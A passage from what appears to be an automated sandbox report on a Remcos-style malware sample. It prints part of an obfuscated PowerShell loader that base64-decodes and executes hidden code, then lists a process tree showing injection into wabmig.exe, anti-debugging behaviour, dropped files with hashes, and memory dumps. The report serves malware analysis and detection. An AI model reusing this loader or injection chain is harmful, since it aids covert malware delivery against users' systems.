ss+Sempe+Anako%tufta$ConcoANdbref A prt Indhrd nceyYpur kFlo inSideripokalnMetacg Soris soft.NykalcTroggoAfhrdu ruen P.eftDdema ') ;$Monopoliseret=$Aftryknings[$Correspondentship];}$Strafferegistrenes239=332230;$Hundehvalpene=29477;Graenseprovins (Ferulaceous15 ' und$KonkugMa.lolVirksoPapilbN,geraPolyhlB.neg:UvsencEnormaAgenduLimstd paleaSt mmeBlomk Aztec=Doll oversGPlen e VisntTusin-BradyCIndskoCurumnSp totBenzyeTronanAffaltHeau, Hofso$RntgePP eria HorisSagres ndera ScrunRarert RrbleRealirGi,penD ooleDownhsstudi 
');Graenseprovins (Ferulaceous15 ' olon$ Kistgstavrlt enso OverbDaugha ScaflTawny:dubleTNoveliSkolelUdtrksc,ppetM gilr,ygosa Ber.nTid tspedompsaturo ComprC nchtfund eSkader Grooe ElecdPyreneAssev eko=gui.e Frugt[ShlumSBlindyDreams Prect CotteSupvrm Pare.TransCStipeovid,rn BetjvImpereTabitrTe sttB wal]terri:Isbjr:.onpaFglacirGuachodi tomBur eB ,orda MurbsUspileTauto6Anti.4SisseSu,bectPam.hrMov eiln denAdamsgUrino(Udsm,$Sectic ForsaOlieruStil dSa loaGrayceCappu)T,pab ');Graenseprovins (Ferulaceous15 'S.uds$Portrgunclel JudooAntipbBran.au ragl oble: M,slNT gstoBro.bn DictrI.tegess.nmtLak fiZafferUdstuePrognmUn.lueS vtanDictrtSyste Komp=Polye .hsde[klub S EtioyBordksYdendtStigbeDatasmUdgiv.Arro.T d ngeFravrx Rob.tPum e.FrnutEAutisnN,urocAno ooPh.red atoviGyl,enTrafigPeakk]Canke:misso:bl mmAMenupSOver CsituaINereiIbedri. EvanGVarmheKlosetPotteSFoliet CamorAndroiD natn Sporg nond(Fiske$AsleeT AfriiIn,erlNecrosHek,etFrugtr.paalaReturnClimas c sppG soloA tegrravnetTelefe GaterKosteeFo madAtamaeSkden)Oprre ');Graenseprovins (Ferulaceous15 'Tuj.e$PhagogSubselUdv,do besobUndera MccalKarto: porSPaatrtSvaleoNikanvNonintnight=di,co$AntihNOpby oAr,ejn s rerE soreMarketSisteiLuigirDe bieRuttemGgegue CottnRiskrtRecus.OwrehsAkkomuVar ibEmi asPre,atridserDecori.olitnOverdgOutwo(Prior$pastrSArubatRusserSfreraAnticfSjlegfRo,ane ChanrYokere Pigwg ,edkifupmasAnalot TillrS dwaeRavnenNondeeUgen sElekt2 Tote3overu9,ilow,Humfr$galerHSkriduBidi nphiltdRivebeAfdelhUntinvKbstaaUlfhilant,qp,ynthedagsonEstiveo kal)Lo ke ');Graenseprovins $Stovt;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2584
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Microchip1.Ana && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2112
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:2768

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\ProgramData\remcos\logs.dat

      Filesize

      144B

      MD5

      2629e35680aa33f66231c447fcdfb956

      SHA1

      66bf2663992b42f976dd81b303f86e2f2e861700

      SHA256

      09cf72cc7bd1f7dec7f1bf6201a421fd1c88b2a01fd68c1e970580e6207d8965

      SHA512

      5a73eafa12e7be4356be896b9afb602ee2c1d359d70047d5e39e69e997e89eee0c0b5092703bb7ba5d272e19593b642bb1a964525bc75c41641f95346a54b1a7

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      fbc10c384b33f066e4062bede2cdbe99

      SHA1

      975bcde178dc1d35c5a531a60679a06b988ba511

      SHA256

      88debac1187aa733b61a7bb77aec5b882f639cccb2c8e09e4d64b30b81b118d4

      SHA512

      b7f2c4720a7ac56aa81a8592bdacb21d7aa7c4b3323cbd56bdac42fc48d3a504a3d9eaf245551252b8a1841c873f615e76c539197e47a9c0b4c572d7b1945fa8

    • C:\Users\Admin\AppData\Local\Temp\Cab9B29.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\Tar16FB.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Users\Admin\AppData\Roaming\Microchip1.Ana

      Filesize

      470KB

      MD5

      dc8b20ecb669b12cb2d377e69425b1ae

      SHA1

      7f95a7e40871adbc900378d69125f01672b99484

      SHA256

      efb89bbdef46898ebbb533b069a851427aef1b99983e3156e9b88e4a846828b3

      SHA512

      b9706209f6b21907e9bbc784638877f612674926b12cb2a73bdc0ad50ae93a2dc4e358c5bf524729732afd9798d13aebdcdaa5e424d785819c4cbff9b3ada141

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZATUT4I9LLC7R4B4PPJB.temp

      Filesize

      7KB

      MD5

      c174779a3cd0e99af4ac09a8f0c348ca

      SHA1

      fe356a28744cc305fa8c3e64289da4ea55f0c1e5

      SHA256

      ccad0a305e0d4e1994ee2b198bdc0ae6d32e7dd1469c57e359b768b75cdf7275

      SHA512

      912738b6f6652dea0fd1f1d163e8b92fffd84a48eac790b4e7353f3edf220f0a145b74acdb61f55c418c76e6198e4b950fb5c84d36114d9ad0cf3b3e8b2de496

    • memory/2236-24-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

      Filesize

      9.6MB

    • memory/2236-21-0x000000001B5B0000-0x000000001B892000-memory.dmp

      Filesize

      2.9MB

    • memory/2236-28-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

      Filesize

      9.6MB

    • memory/2236-29-0x000007FEF570E000-0x000007FEF570F000-memory.dmp

      Filesize

      4KB

    • memory/2236-30-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

      Filesize

      9.6MB

    • memory/2236-25-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

      Filesize

      9.6MB

    • memory/2236-23-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

      Filesize

      9.6MB

    • memory/2236-20-0x000007FEF570E000-0x000007FEF570F000-memory.dmp

      Filesize

      4KB

    • memory/2236-62-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

      Filesize

      9.6MB

    • memory/2236-22-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB

    • memory/2236-26-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

      Filesize

      9.6MB

    • memory/2584-35-0x00000000065D0000-0x00000000093DB000-memory.dmp

      Filesize

      46.0MB

    • memory/2768-60-0x0000000000420000-0x0000000001482000-memory.dmp

      Filesize

      16.4MB

    • memory/2768-36-0x0000000001490000-0x000000000429B000-memory.dmp

      Filesize

      46.0MB

    • memory/2768-61-0x0000000001490000-0x000000000429B000-memory.dmp

      Filesize

      46.0MB